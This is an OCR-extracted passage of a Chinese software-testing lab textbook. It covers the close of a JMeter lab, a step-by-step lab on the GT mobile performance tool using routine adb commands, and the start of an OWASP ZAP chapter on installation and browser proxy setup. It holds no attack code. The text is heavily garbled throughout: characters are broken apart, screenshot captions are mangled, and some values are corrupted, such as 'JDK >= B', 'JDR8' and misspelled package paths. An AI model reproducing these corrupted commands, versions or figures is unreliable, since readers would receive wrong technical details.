$ CockieManager behaviour - prefix to add to cookie name before storing it as a variable 
to remove the prefix, define it as one or more spaces 


# 
* 


# CookieManager behaviour - check received cookies are valid before storing them? 


CookieManager.allow variable cookiesetrue 


Default is COOKIE ; 
|CookieManager.name prefix- 


$ Default is true. Use false to revert to previous behaviour 


# 
e 


1 
H 
B 
1 
+ 
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|CookieManager.check.cookiesetrue 


Netscape HTTP Cookie file 
/'o0kies-cookies 


Ability to switch to Nashorn as default Javascript Engine used by IfController and 


JMeter works as following: 


- JDK >= B and javascript.use rhino-false or not set : 


- JDK >= 8 and javascript.use rhino-true: Rhino 


Nashorn 


If you want to use Rhino on JDR8, set this property to true 


javascript.use rhino-false 


aron 


javaScript function 








图 16-30 ”修改 配置 


配置 完成 后 ,虽然 登录 成 功 , 但 查看 结果 里 第 一 条 链接 还 是 会 报错 。 原 因 是 重 定 向 302 
造成 的 ,最 终 发 现 问题 出 在 响应 断言 的 设置 上 ,如 图 16-31 所 示 。 
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图 16-31 





响应 断言 设置 


如 果 选 择 Main sample and sub-samples ,执行 的 每 个 结果 都 要 判断 ,但 是 action 的 链接 
没有 响应 ,所 以 会 报错 ,只 能 选择 Main sample only, 这 样 执行 就 全 部 通过 了 。 
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专家 点 评 


自动 化 脚本 的 调试 需要 有 足够 的 耐心 和 信心 , 先 把 大 的 框架 写 好 ,再 一 点 一 点 地 调 细 
节 ,出 现 的 错误 很 可 能 在 非常 微小 的 细节 上 。 

脚本 调 通 后 ,还 需要 做 些 优化 。 用 户 名 的 定义 ,一 开始 是 手动 输入 ,但 执行 一 次 就 必须 
修改 用 户 名 ,如 果 忘 记 了 ,用 户 注册 的 前 几 条 都 会 报错 ,这 种 自动 化 脚本 并 不 好 ,所 以 后 面 改 
成 了 字母 加 随机 数字 ,这 样 就 不 需要 每 次 执行 都 修改 定义 好 的 变量 ,更 能 体现 自动 化 的 

在 实际 操作 中 ,肯定 会 遇 到 很 多 问题 ,多 思考 、 多 观察 、 多 优化 ,累积 多 了 之 后 再 写 脚本 ， 
思路 就 更 加 清晰 。 


E 拓展 训练 


对 智慧 绍兴 系统 http://www. roqisoft. com/zhsx 用 本 实验 讲解 的 JMeter 自动 化 测试 
工具 设计 更 多 的 自动 化 测试 用 例 。 

提醒 : 可 以 在 http://collegecontest. roqisoft. com/awardshow. html 中 查阅 历年 全 国 
高 校 大 学 生 在 这 些 网 站 中 发 现 的 更 多 自动 化 测试 工具 的 使 用 。 





实验 16 ”自动 化 测试 工具 JMeter 训练 





读书 笔记 
4 €; ^d; e@; ed; ed; ed; e@; ed; e@; ^4; e@; ^4; ot; 


读书 笔记 Name: Date: 








励志 名 句 : The greatest test of courage on earth is to bear defeat without 


losing heart. 





世界 上 对 勇气 的 最 大 考验 是 忍受 失败 而 不 丧失 信心 。 
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实施 自动 化 测试 的 目标 和 意义 : 对 于 功能 已 经 完整 和 成 熟 的 软 
件 , 每 发 布 一 个 新 的 版 本 ,其 中 大 部 分 功能 和 界面 都 和 上 一 个 版 本 相 
似 或 完全 相同 ,这 部 分 功能 特别 适合 于 自动 化 测试 ,从 而 可 以 让 测试 
达到 测试 每 个 特征 的 目的 。 

近年 来 ,移动 应 用 软件 数量 和 类 型 迅猛 发 展 ,使 用 过 程 中 的 软件 
质量 问题 频 发 。 与 传统 软件 相 比 不 同 的 是 ,移动 应 用 软件 在 安全 性 、 
稳定 性 ,兼容 性 等 方面 要 求 更 高 ,因此 对 它 的 测试 显得 尤为 重要 。 本 
实验 讲解 的 GT 工具 就 是 对 移动 平台 进行 测试 的 工具 ,小 巧 并 且 
实用 。 


17.1 移动 APP 自动 化 测试 


移动 应 用 软件 运行 在 移动 智能 终端 上 。 与 传统 PC 软件 不 同 , 移 
动 智 能 终端 运行 内 存 较 小 .存储 空间 及 设备 电源 有 限 ,这 些 特点 都 给 
移动 应 用 软件 的 测试 工作 增加 了 许多 难度 。CPU 内存 泄漏 、 耗 电 、 
弱 网 .流畅 度 / 卡 顿 , 稳 定性 等 方面 成 为 测试 关注 的 重 中 之 重 。 针 对 软 
件 中 的 安全 、 性 能 .协议 等 问题 ,腾讯 公司 在 2010 年 成 立 了 “专项 技术 
测试 ?岗位 。 在 移动 互联 网 时 代 的 今天 ,专项 测试 更 是 显得 尤为 重要 。 

针对 移动 应 用 的 专项 测试 ,部 分 测试 项 与 传统 PC 软件 的 性 能 测 
试 有 相似 的 地 方 ,测试 项 主要 包括 CPU 占用 、 内 存 占用 、` 流 量 消耗 E 
量 消耗 等 。 首先 ,介绍 常用 测试 项 的 含义 。 

1. CPU 占用 

CPU 占用 是 运行 的 程序 占用 的 CPU 资源 ,表示 某 个 时 间 点 的 运 
行程 序 占 用 移动 设备 CPU 的 情况 。2012 年 下 半年 开始 ,各 家 手机 厂 
商 推出 的 主打 旗舰 机 型 多 以 四 核 处 理 器 为 卖点 ,多 核 手 机 似 已 成 为 主 
流 , 目 前 CPU 核 数 最 高 已 达到 十 核 。 根据 第 三 方 数据 服务 提供 商 
TalkingData 发 布 的 报告 (2015 年 底 ) ,全 国平 均 每 部 移动 设备 上 安装 
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T 34 款 应 用 ,这 个 数字 相信 和 只 会 增加 而 不 会 减少 。 因 此 ,应 用 的 CPU 占用 量 将 会 十 分 影响 
手机 性 能 。 

2. 内 存 占用 

手机 内 存 一 般 分 为 RAM 和 ROM。RAM 运行 内 存 通 常 作为 操作 系统 或 其 他 正在 运 
行程 序 的 临时 存储 介质 ,也 称 系统 内 存 。 就 好 比 计算 机 中 的 内 存 条 ,内 存 条 容量 越 大 ,计算 
机 就 有 更 多 的 内 存 来 存储 同时 运行 的 任务 ,系统 响应 的 速度 也 就 越 快 ,RAM 在 手机 中 就 起 
到 了 这 个 作用 。ROM 则 是 机 身 存储 空间 ,主要 包含 自身 系统 占据 的 空间 和 用 户 可 用 的 空 
间 两 部 分 。ROM 相当 于 PC 上 的 硬盘 ,用 来 存储 和 
保存 数据 。 即 使 是 断 电 ,ROM 也 能 够 保留 数据 。 手 
机 中 的 系统 文件 ,或 者 图 片 .音乐 、 照 片 等 通常 是 存 




















储 在 ROM 的 。 
我 们 这 里 所 述 的 内 存 占用 ,主要 指 的 是 RAM | Sees 
运行 内 存 。 目 前 手机 运行 内 存 最 高 已 达到 SGB. 内 | y aos a 
存 占用 过 高 ,甚至 出 现 内 存 泄漏 会 直接 出 现 APP 卡 
死 或 停止 运行 的 情况 。 @ mos = 
3. 流量 消耗 re = 
流量 消耗 是 指 应 用 使 用 过 程 中 的 流量 消耗 情 一 
况 ,分 为 上 行 流量 (发 送 ) 和 下 行 流量 (下 载 )。 Qs - 
4. 电量 消耗 
电量 消耗 是 指 应 用 的 耗 电 情 况 ,一般 手 机 是 自 | urs u 
带电 量 消耗 统计 的 ,也 会 以 文件 的 形式 存储 在 手机 m =, 
中 ,如 图 17-1 所 示 。 2 . 
Hiit LAELAE TA DK | GA ssss 
移动 应 用 的 性 能 数据 。 以 Android 应 用 为 例 , 有 网 





易 的 Emmagee、 腾 讯 的 GT Itest 等 。 本 次 实验 以 
GT 工具 为 例 。 图 17-1 耗 电量 排行 

GT 是 APP 的 随身 调 测 平 台 , 它 是 直接 运行 在 
手机 上 的 “集成 调 测 环境 ”(Integrated Debug Environment. IDTE). FIH GT, 仅 赁 一 部 手 
机 ,无 须 连接 计算 机 , 即 可 对 APP 进行 快速 的 性 能 测试 (CPU 内存、 流量 .电量 、 帧 率 /流畅 
度 等 ) ,开发 日 志 的 查看 ,Crash 日 志 的 查看 ,网 络 数据 包 的 抓 取 ,APP 内 部 参数 的 调试 , 真 机 
代码 耗 时 统计 等 。 

HE. 因为 本 节 实 验 是 对 Android 应 用 进行 专项 测试 数据 收集 ,在 此 过 程 中 可 能 会 用 到 
Android 环境 中 的 一 些 命令 ,因此 ,请 大 家 保证 自己 计算 机 已 经 配置 好 Android 环境 ,并 能 
够 正确 运行 相关 命令 (如 adb 命令 ) ,连接 手机 并 打开 USB 调试 ,输入 以 下 命令 : 


adb devices 


结果 如 图 17-2 所 示 。 
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RA 93] 
(c) 2016 Microsoft Corporation。 保留 所 有 权利 。 


adb devices 
ttached 
(31) doesn't match this client (39); killing... 
successfully * 
device 


C:\Users\asus> 








图 17-2 查看 设备 连接 状态 
17.2 移动 APP 自动 化 测试 工具 GT 的 使 用 


17.2.1 GT 的 安装 与 启动 


GT 也 是 一 个 Android 应 用 ,到 官方 网 站 下 载 apk 文件 后 ,在 安装 包 路 径 下 打开 命令 窗 
口 ,输入 命令 : 


adb install GT 2.2.6.5.apk 


运行 结果 如 图 17-3 所 示 











图 17-3 用 ad 命令 安装 应 用 
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在 手机 端 打开 GT 应 用 ,如 图 17-4 所 示 。 





晚上 7:52 -3 RR dcE 


v GT, 


被 调试 的 应 用 : 


ii 请 选择 被 调试 的 应 用 - 
|. 5h 


内 存 助手 


Private Dirty 





E174 启动 GT 


启动 后 首页 为 AUTCApp Under Test) ,用 户 可 以 进行 选择 要 监测 的 性 能 指标 。 下 面 
是 对 部 分 指标 的 说 明 。 

(1) PSS(Propotionate Set Size) : 应 用 实际 使 用 的 物理 内 存 ; Android 系统 计算 的 统计 
信息 ,以 确定 是 否 要 杀 死 某 个 进程 。Android 是 基于 Linux 的 系统 ,而 在 Linux 中 常常 使 用 
“共享 "页面 来 跨 进 程 共 享 相 同 的 内 存 , 因此 只 看 应 用 程序 消耗 多 少 内 存 是 不 全 面 的 。 
Android 系统 可 能 会 杀 死 使 用 太 多 内 存 的 应 用 程序 (尤其 是 如 果 应 用 程序 在 后 台 ), 因 此 
Android 系统 需要 找到 一 种 方法 来 可 靠 地 计算 应 用 程序 负责 的 内 存量 。 

(2) Private Dirty: 基本 上 是 进程 内 不 能 被 分 页 到 磁盘 的 内 存 , 也 不 和 其 他 进程 共享 。 
在 Android 系统 中 ,每 个 APP 所 占 的 内 存 会 有 Share Dirty( 公 共 )、Private Dirty CEA Pj 
部 分 。 

(3) jiffies: 是 Linux 内 核 中 的 全 局 变量 ,也 是 CPU 时 间 片 的 单位 ; 监控 jiffies 可 以 反 
We APP 占用 系统 CPU 的 情况 。 

(4) Net: 为 流量 信息 。 


17.2.2 选择 一 个 被 测 应 用 并 选择 监控 指标 
本 实验 选用 蘑菇 街 作为 AUT, 选 择 监控 PSS.CPU,NET 指标 ,如 图 17-5 所 示 。 
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Appium Settings ki 


Lj 


commoguiie 


日 My Application 1 Umi 
a 安 云 加 速 器 — 
[T| iTest 
m CoCoin 
百度 输入 法 小 六 版 
g Google Play 商店 
n 远程 协助 





图 17-5 设置 被 测 应 用 


17.2.3 启动 被 测 APP 
如 果 被 测 APP 尚未 启动 ,可 以 通过 点 i 





“启动 ”按钮 打开 APP, 如 图 17-6 所 示 。 


可 pss r 启动 APP 后 ， 点 击 GT 小 图 标 
其 他 指标 回 到 GT 应 用 中 
wf cpu 


PETI 





图 17-6 通过 GT 启动 应 用 
注意 : RFNA GR LE 可 以 通过 以 下 方式 检查 。 选 择 “ 设 置 ”>“ 授 权 管理 ”一 
“应 用 权限 管理 ”~GT, 将 “显示 悬 浮 窗 ”设置 为 匀 选 状态 。 以 红 米 3 为 例 , 设 置 步骤 如 图 17-7 
所 示 。 











晚上 9:35 y e m+ 

Eri @ 

HRS - 

A 。 其 他 账号 

S 同步 

es 

BER ”系统 应 用 

O 更 多 应 用 





”关于 手机 
"9:36 í o m +m 
ç 应 用 管理 权限 管理 @ 
Google 账 户 管理 程序 
19 项 权限 





21 项 权限 


Test3-2-5 
2 项 权限 
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自 启 动 管理 


应 用 权限 管理 


USB 安 装 管理 


ROOT 权限 管理 


发 送 彩信 
直接 发 送 彩信 


隐私 相关 


定位 
通过 网 络 或 者 卫星 对 您 的 手机 定位 


设置 旧 关 


系统 设置 
修改 系统 设置 


开启 WIFI 
开启 WIFI 


锁 屏 显示 
允许 应 用 在 辆 屏 上 显示 


后 台 弹 出 界面 
允许 应 用 在 后 台 强 出 界面 





+o ea 





浮 窗 











图 17-7 FARE 
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17.2.4 选择 本 次 测试 的 性 能 指标 


进入 “参数 ”页 ,选择 “出 参 ” 页 面 ; 点 击 “ 编 辑 ” 按 钮 , 拖 动 想 关注 的 参数 至 “已 关注 的 参 
数 ” 栏 ,点 击 “ 完 成 ” i 如 图 17- 8 所 示 。 








图 17-8 设置 关注 的 指标 
17.2.5 设置 需要 时 刻 关 注 的 参数 


在 “编辑 ”状态 下 ,将 需要 时 刻 关注 的 参数 拖 入 “悬浮 窗 展 示 的 参数 ” 栏 中 ,点 击 “ 完 成 ” 按 
钮 如 图 17-9 所 示 。 


CPU GU gem 
CPU 


EY MEM NMEM 
MEM 


ye NET net 
NET 





图 17-9 设置 悬浮 窗 显示 的 指标 
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17.2.6 打开 被 测 APP 进行 测试 

开始 采集 数据 后 ,可 以 根据 测试 需求 在 APP 上 进行 操作 。 值 得 注意 的 是 ,此 时 需要 非 
常 明确 自己 关注 的 是 什么 场景 下 的 性 能 数据 ,也 就 涉及 性 能 测试 用 例 设计 相关 的 知识 。 例 
如 ,案例 中 想 测试 的 是 首页 加 载 的 性 能 情况 .如 图 17-10 所 示 。 









点 击 小 红 点 可 以 开始 采集 数据 





e A A O È 20178HE GE RSEN I C CIO UR I 


runa ta fu RUN GEN IE: FO ERO SMCIBIRRTOPO, A 8EREIPIK 
"ex 


wm ew sa 55 根据 测试 需求 对 APP 进 行 操作 — TFBoys 封 画 PK | 谁 的 
" ma 





可 攻 可 仙 可 软 可 戎 的 白色 
IE 就 决定 是 你 了 
BTEBENAAGEXK p ` 





图 17-10 在 被 测 应 用 中 进行 操作 
17.2.7 测试 完毕 返回 GT 应 用 
测试 完毕 返回 GT 应 用 ,具体 操作 如 图 17-11 所 示 。 


点 击 暂 停 图 标 ， 停 止 后 
返回 GT 应 用 





图 17-11 返回 GT 应 用 
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17.2.8 查看 性 能 指标 详细 信息 


例如 ,要 查看 CPU 的 详细 信息 , 则 可 以 点 击 CPU 指标 , 即 可 看 到 历史 曲线 信息 ,如 
图 17-12 所 示 。 























MEM MEM 


历史 曲线 信息 ; 
长 按 可 以 看 具体 
数值 





图 17-12 查看 详细 性 能 数值 
17.2.9 保存 性 能 测试 数值 
保存 性 能 测试 数值 ,如 图 17-13 所 示 。 


CPU CPU 


MEM MEM 
pm 


NET NET 





图 17-13 保存 性 能 测试 数值 
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17.3 自动 化 测试 结果 分 析 


17.3.1 进一步 分 析 测试 结果 文件 
保存 后 在 手机 中 找到 测试 结果 文件 ,做 进一步 分 析 。 
(1) 可 以 通过 adb 命令 来 查看 文件 保存 的 情况 ,依次 输入 命令 : 


adb shell # 进 入 shell 


cd /sdcard/GT/GW/com. nogujie/10.2.0.8719/testl # 切换 到 存储 目录 下 (与 上 一 步骤 的 设置 保持 一 
致 ) 
ls # 查 看 目录 下 的 文件 


由 于 文件 目录 较 长 ,分 三 步 依次 进入 目录 中 ,如 图 17-14 所 示 。 











图 17-14 通过 adb 命令 查看 文件 


注 : 与 Linux 下 的 command 操作 一 致 ,adb shell 下 也 可 以 使 用 Tab 键 进行 命令 的 自动 
补 齐 。 

输入 命令 exit, 退 出 adb shell 

(2) 输入 如 下 命令 可 以 将 手机 上 的 文件 复制 到 计算 机 中 ,结果 如 图 17-15 和 图 17-16 
所 示 。 

adb pull /sdcard/GT/GW/com. mogujie/10. 2. 0. 8719/testl/CPU 20171222222113. csv d://tools// 

cpu. csv 


用 类 似 的 命令 可 以 将 其 他 信息 也 导出 到 本 地 计算 机 中 。 
注 : 如 果 出 现 不 能 进 行文 件 操作 的 情 况 , 请 检查 手机 是 否 开启 了 root 权限 。 


17.3.2 GT 工具 学 习 总 结 


完成 实验 步骤 中 各 项 操作 后 ,得 到 了 针对 某 个 场景 的 性 能 测试 数据 。 这 仅仅 是 进行 专 
项 测试 的 基础 ,重要 的 是 能 够 通过 对 性 能 数据 的 分 析 , 发 现 并 定位 性 能 问题 (如 CPU 占用 
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ÜsersVasus?adb pull /sdcard/ jie/10. 9 2222113. csv d://tools//cpu. 
/ sácard/GT/GW/com. moguji e/1C tl1/CPU : le pulled. 0.4 NB/s (1870 bytes in 0. 004s) 


C:\Users\asus> 


C:\Users\asus> 








图 17-15 将 文件 导出 到 本 地 计算 机 


Data2 (D:) 





B] cpu.csv 
ÉY GT 22.65.apk 
ÉY iTest4.5.0.apk 








图 17-16 文件 存储 到 本 地 计算 机 


过 高 .内 存 泄漏 等 )。 这 部 分 内 容 很 有 深度 ,大 家 可 以 参考 其 他 资料 进行 学 习 。 
本 节 实 验 主要 介绍 了 快速 使 用 GT 工具 进行 性 能 数据 采集 ,大 家 可 以 结合 具体 的 
Android 应 用 及 性 能 场景 ,分 析 并 定位 具体 的 性 能 问题 。 


17.3.3 实验 补充 说 明 


在 自动 化 工具 尚未 出 现 前 ,开发 人 员 或 是 测试 人 员 往 
发 工具 中 进行 性 能 监测 。 下 面 以 Android Studio 为 例 , 简 单 
步骤 如 下 。 

(1) 连接 手机 并 打开 调试 模式 ,打开 Android Studio 

(2) 打开 Android Monitor 视图 。 

(3) 选择 被 测 应 用 所 对 应 的 包 名 

(4) 根据 场景 操作 APP, 观 察 性 能 指标 ,如 图 17-17 所 示 


zw 3 
x25 专家 点 评 
移动 应 用 性 能 测试 是 一 个 技术 含量 较 高 但 十 分 重要 且 有 意义 的 工作 ,需要 长 时 间 的 积 
累 才 可 能 有 较 大 的 突破 与 收获 。 在 实际 的 开发 过 程 中 ,应 有 专门 的 团队 来 负责 应 用 的 专项 
测试 ,保证 产品 质量 。 








直接 通过 adb 命令 或 者 在 开 
演示 如 何 进 行 性 能 测试 。 主 要 
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Redmi 3 (905cc4257462) w system process (2742) - x O @ @ [ive PI] 
Advanced profiling is unavailable for the selected process 
Configure this setting in the Run Confiquration 














NETWORK 一 Sending: OB/S 一 Receiving: O B/S 


30ma5 00s 30m50.00s somssoos aim 31m$00 








图 17-17 在 Android Studio 中 观察 性 能 指标 


dU sms 


用 GT 工具 对 你 所 喜欢 的 一 款 移动 APP 进行 测试 。 
提醒 : 可 以 在 http://collegecontest. roqisoft. com/awardshow. html 中 查阅 历年 全 国 
高 校 大 学 生 在 这 些 网 站 中 发 现 的 更 多 自动 化 测试 工具 的 使 用 。 
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Nx 
读书 笔记 


ae 


读书 笔记 Name: Date: 








励志 名 句 : Only they who fulfill their duties in everyday matters will 


ful fill them on great occasions. 





只 有 在 日 常生 活 中 尽责 的 人 才 会 在 重大 时 刻 尽责 。 















































安全 渗透 测试 工具 ZAP 训练 ， 


详 政 目的) 

OWASP Zed Attack Proxy(ZAP) 是 一 个 易于 使 用 交互 式 的 .用 
于 Web 应 用 程序 漏洞 挖掘 的 渗透 测试 工具 。 它 既 适 用 于 安全 专家 、 
开发 人 员 ,功能 测试 人 员 ,也 适用 于 渗透 测试 人 门 人员 , 它 除了 提供 自 
动 扫描 工具 ,还 提供 了 一 些 用 于 手动 挖掘 安全 漏洞 的 工具 。 

ZAP 是 一 个 很 好 的 安全 测试 工具 ,在 持续 性 整合 环境 中 ,可 以 很 
快 发 现 安全 漏洞 。 当 代码 被 提交 后 ,配置 好 代理 ,用 Selenium 做 功能 
回归 测试 (regression test) ,漏洞 扫描 与 渗透 测试 完成 后 ,ZAP 将 会 出 
一 份 安全 报告 。 

本 实验 指导 读者 如 何 使 用 ZAP 工具 进行 安全 渗透 测试 ,并 分 析 
扫描 结果 。 


18.1 ZAP 工具 的 特点 


ZAP 的 特点 如 下 。 

(1) 免费 .开源 。 

(2) 跨 平台 。 

(3) 易 用 。 

(4) 容易 安装 。 

C» 国际 化 ,支持 多 国语 言 。 
(6) 文档 全 面 。 


18.2 安装 ZAP 


本 书 只 介绍 ZAP 2. 3. 1 Windows 标准 版 的 相关 内 容 。 当 然 , 读 
者 可 以 自行 下 载 与 使 用 最 新 的 版 本 。 


292 


N 


软件 测试 实验 实 训 指南 


18.2.1 环境 需求 


ZAP 2.3.1 Windows 版 本 需要 Java 7 的 系统 环境 ,所 以 首先 安装 Java 7 JDK 或 者 
JRE, 然 后 安装 ZAP, 才 可 以 正常 启动 ,否则 将 报错 。 虽 然 目 前 也 有 可 以 直接 安装 成 功 的 ,但 
是 安装 成 功 后 ,启动 ZAP 会 提示 需要 Java 环境 ,如 图 18-1 所 示 。 


Virtual Machine Launcher. 








Error: Could not create the Java Virtual Machine. 
Error: A fatal exception has occurred. Program will exit 


[= | 








This application requires a Java Runtime Environment 1.7.0 





Ë 18-1 Java 环境 错误 


18.2.2 安装 步骤 


下 面 介绍 在 Windows 环境 下 安装 ZAP 软件 的 安装 过 程 。 

(1) 访问 https://www. owasp. org/index. php/ZAP, 下 载 安 装 包 Zap_2. 3. 1. Windows. 
exe, 如 图 18-2 所 了 示 。 也 可 以 到 本 书 配套 网 站 http://books. roqisoft. com/download 下 载 
ZAP 软件 。 


ZAP 2.3.1 Standard 1 





20140521 66.3 MB 


NT TOSS DUO: OTET 5 
Mac OS/X 20140521 — 2120MB Download now 





图 18-2 安装 文件 


(2) 双击 Zap_2. 3. 1. Windows. exe 开始 安装 ,首先 打开 欢迎 界面 , 单 击 Next 按钮 ,如 
图 18-3 所 示 。 

(3) 进入 接受 协议 界面 .选中 I accept the agreement, 然 后 单 击 Next 按钮 ,如 图 18-4 
所 示 。 

(4) 进入 选择 安装 目录 界面 ,可 以 单 击 Browse 按钮 , 自 定义 安装 目录 , 单 击 Next 按钮 
进入 下 一 步 ,也 可 以 用 默认 目录 直接 单 击 Next 按钮 进入 下 一 步 ,如 图 18-5 所 示 。 

(5) 可 以 单 击 Browser 按钮 选择 开始 菜单 安装 目录 ,也 可 以 用 默认 目录 直接 单 击 Next 
按钮 进入 下 一 步 , 如 图 18-6 所 示 。 

(6) 可 以 选择 Create a desktop icon 创建 一 个 桌面 图 标 , 如 图 18-7 所 示 ,选择 Create a 
Quick Launch icon 创建 一 个 快捷 菜单 图 标 。 当 然 , 也 可 以 两 者 都 不 选 ,那么 桌面 图 标 和 快 
捷 菜 单 图 标 将 不 被 创建 。 

CT) 创建 桌面 图 标 , 单 击 Next 按钮 ,进入 准备 好 安装 界面 ,如 图 18-8 所 示 。 
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IË) Setup - OWASP Zed Attack Proxy 2.3.1 





Welcome to the OWASP Zed 
Attack Proxy 2.3.1 Setup Wizard 
This wi instal OWASP ZAP Version 2.3.1 on your computer. 


Tt s recommended that you dose all other applications before 
Continuing. 


Click Next to continue, or Cancel to exit Setup. 

















图 18-3 欢迎 界面 
iB) Setup - OWASP Zed Attack Proxy — e - nn 


License Agreement 
Please read the folowing important information before continuing. 











Please read the following License Agreement. You must accept the terms of this 
agreement before continuing with the installation. 
















Preamble B 


[The intent of this document is to state the conditions under which a 
Package may be copied, such that the Copyright Holder maintains some 
|semblance of artistic control over the development of the package, while 
|piving the users of the package the right to use and distribute the 
Package in a more-or-less customary fashion, plus the right to make 
reasonable modifications. 





© [accept the agreement 
1do not accept the agreement 


























图 18-4 接受 协议 界面 


前 Setup - OWASP Zed Attack Proxy 2.3.1 TER 





Select Destination Location 
Where should OWASP Zed Attack Proxy 2.3. 1 be installed? 





| Setup wil instal OWASP Zed Attack Proxy 2.3. 1 into the following folder. 


To continue, dick Next. If you wouid ike to select a different folder, dick Browse. 








W Atleast 94.1 MB of free disk space is required. 


E 

















图 18-5 选择 安装 目录 界面 
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- OWASP Zed Attack Proxy 2.3.1 EN = 
Select Start Menu Folder 
Where should Setup place the program's shortcuts? 





uL Setup wil create the program's shortcuts in the folowing Start Menu folder. 


To continue, dick Next. 1f you wouid ike to select a different folder, dk Browse. 


OWASP Browse... 





El Don't create a Start Menu folder 


| <t 


图 18-6 选择 开始 菜单 目录 























Select the additional tasks you would ike Setup to perform whie instaling OWASP Zed 
Attack Proxy 2.3.1, then dick Next. 





Additional icons: 
[F] Create a desktop icon. 
E Create a Quick Launch icon. 








图 18-7 创建 桌面 图 标 界面 


ËJ Setup - OWASP Zed Attack Proxy 2.3.1 







Ready to Install 
Setup is now ready to begin instaling OWASP Zed Attack Proxy 2.3.1 on your. 
computer. 





Click Install to continue with the installation, or dick Back if you want to review or 
change any settings. 


Destination location: = 
C:\Program Fies (x86)\OWASP ed Attack Proxy 














18-8 准备 好 安装 界面 
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(8) 确认 所 有 安装 选项 , 单 击 Install 按钮 开始 安装 。 图 18-9 所 示 为 安装 进行 中 界面 。 








iB Setup - OWASP Zed Attack Proxy 2.3.1 








Please wait while Setup installs OWASP Zed Attack Proxy 2.3.1 on your 
computer. 


Extr - | 
C:\Program Fies (x86) OWASP Zed Attack Proxy Wb commons -collections-3.2. 1jar 














图 18-9 安装 进行 中 界面 


(9) 安装 完成 后 ,将 进入 安装 完成 界面 ,如 图 18-10 所 示 , 单 击 Finish 按钮 ,完成 安装 
退出 安装 程序 。 








而 Setup - OWASP Zed Attack Proxy 2.3.1 Lev — mmm 








Completing the OWASP Zed 
Attack Proxy 2.3.1 Setup Wizard 
Setup has finished instaling OWASP Zed Attack Proxy 2.3.1 
on ya computer. The acplcaon may be launched by 
selecting the installed icons. 


Cik Finish to exit Setup. 











图 18-10 安装 完成 界面 


18.3 基本 原则 


ZAP 使 用 代理 的 方式 来 拦截 网 站 ,用 户 可 以 通过 ZAP 看 到 所 有 的 请 求 和 响应 ,还 可 以 查 
看 调用 的 所 有 AJAX, 而且 可 以 设置 断 点 修改 任何 一 个 请 求 。 查 看 请 求 和 响应 ,如 图 18-11 
所 示 。 

18.3.1 配置 代理 


在 开始 扫描 之 前 ,用 户 需 要 配置 ZAP 作为 代理 。 
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Welcome to the OWASP Zed Attack Proxy (ZAP) 


ZAP is an easy to use integrated penetration testing tool for finding vulnerabiliies in web applications 


Please be aware that you should only attack applications ihat you have been specifically been given permission lo test. 


To quicty test an application, enter ts URL below and press ‘Atac 





tp @ Seea. 
px | mo 


Not started 








图 18-11 查看 请 求 和 响应 


1. 在 “工具 ”菜单 中 配置 代理 
(1) 从 菜单 栏 选择 “工具 ”一 “选项 ”命令 ,如 图 18-12 所 示 。 















































文件 编辑 查看 分 析 报告 BW Onune 帮助 
Las | se. V *=eb b O x 
Browse API 
Dd í 
ij Scripts. cu me Xm | : 
eus Toggle break on all requests. CubB 
Toggle break on all responses care he OWASP Zed / 
sw CuhS 
au Cic Med penetration testing too! forfin 
Bin Cx 
Add a custom HTTP break point.. CA cc 
Advanced Acive Scan. CHhAPA | enter its URL below and press "| 
手动 请 求 编辑 器 一 Cii 
Run the Garbage Collector. b: 
Manual Send WebSocket Message —— 
yo a sop 
= = w 
Oph | 号 Htpsessions | Gò ZestResuns | -clents | g?WebSockets [ 48 amx: 
Anr | Xaa | Fegi | ò żina | $ Spider | _ 2 Forced Browsi 





18-12 配置 代理 菜单 


(2) 选择 本 地 代理 ,默认 已 经 配置 ,如 图 18-13 所 示 ,如 果 端 口 有 冲突 可 以 修改 端口 。 




















图 18-13 配置 代理 
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2. fÉ Windows 系统 的 Google Chrome 中 配置 代理 
(D 单 击 Google Chrome 右上 角 的 按钮 ,选择 Settings 命令 ,如 图 18-14 所 示 o 








Newtab Ctrl+T 
New window Ctrl N 
New incognito window  Ctrl+Shift+N 
Bookmarks , 
Recent Tabs , 
Edit Cut Copy Paste 
Save page as... Css 
Find... Ctrl+F 
Print... Ctrl+P 
Zoom - 10% + II 
History Ctrl+H 
Downloads Ctrl+J 
Sign in to Chrome... 














图 18-14 Chrome 配置 代理 菜单 
(2) 单 击 Change proxy settings 修改 代理 ,如 图 18-15 所 示 。 





Network 


Google Chrome is using your computer's system proxy settings to connect to the network. 
Change proxy settings... 


图 18-15 Chrome 修改 代理 


(3) 选择 “为 LAN 使 用 代理 服务 器 ”, 输 入 localhost 作为 地 址 ,8080 作为 端口 , 单 击 “ 确 
定 ?按钮 完成 代理 配置 ,如 图 18-16 所 示 。 





















































Internet it 9? Xx 
[an [e£ [Bu [mg 连接。 me [am Q= 
E] 要 设置 Internet 连接 ， 单 击 “ 设 置 ”。 [ EOD 
自动 配置 
技 号 和 虐 拟 专用 网 络 设置 Fp 要 确保 使 用 手动 设置 ， 请 禁用 自动 配 
FE | Cao = 
* Bx RA) 
-使 用 自动 配置 脚本 (S) 
如 果 村 为 连接 配置 代理 服务 器 ， 请 选择 “设置 ”， gH 
| 代理 服务 器 
| | CAN 使 用 代理 服务 器 (这 些 设置 不 用 于 拨号 或 YPN 09 
BARI) GR REX — localhost ari; 8080 Aug | 
Fat 1 Ret ratum a COHOEHURERIERTORRGE S) 
[ we 取消 
[mz j[ wa ELIT 











图 18-16 Chrome 配置 代理 
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3. 在 Windows 系统 的 Firefox 中 配置 代理 
(1) 在 Firefox 中 按 住 Alc 键 , 会 显示 菜单 ,选择 Tools Options 命令 ,如 图 18-17 
所 示 。 


Downloads CtrlsJ 
Add-ons Ctrl+Shift+A 
Set Up Sync... 


SQL Inject Me. 
Web Developer 
Page Info 





图 18-17 Firefox 菜单 


(2) 弹出 Options 对 话 框 ,依次 选择 Advanced Network- Settings. Wn] 18-18 所 示 。 

Options t 
j = GZ à "ao |] 
General Tabs Search Content Applications Privacy Security — Sync 

General [Data Choices [Network] update | Certificates: 

















Connection 

Configure how Firefox connects to the Internet [ ssttinos-. |] 
Cached Web Content. 

Your web content cache is currently using 2.6 MB of disk space Clear Now 


E) Qverride automatic cache management. 
Limit cacheto | 3502 MB of space 


Offline Web Content and User Data 
Your application cache is currently using 0 bytes of disk space Clear Now 
V). Tell me when a website asks to store data for offline use Exceptions. | 


The following websites are allowed to store data for offline use: 
Remove... | 


(3) 选择 Manual proxy configuration ,如 图 18-19 所 示 ,在 HTTP Proxy 文本 框 中 输入 
localhost, fE Port 文本 框 中 输入 8080 , 单 击 OK 按钮 完成 代理 配置 。 

4. 在 Windows 系统 的 IE 中 配置 代理 

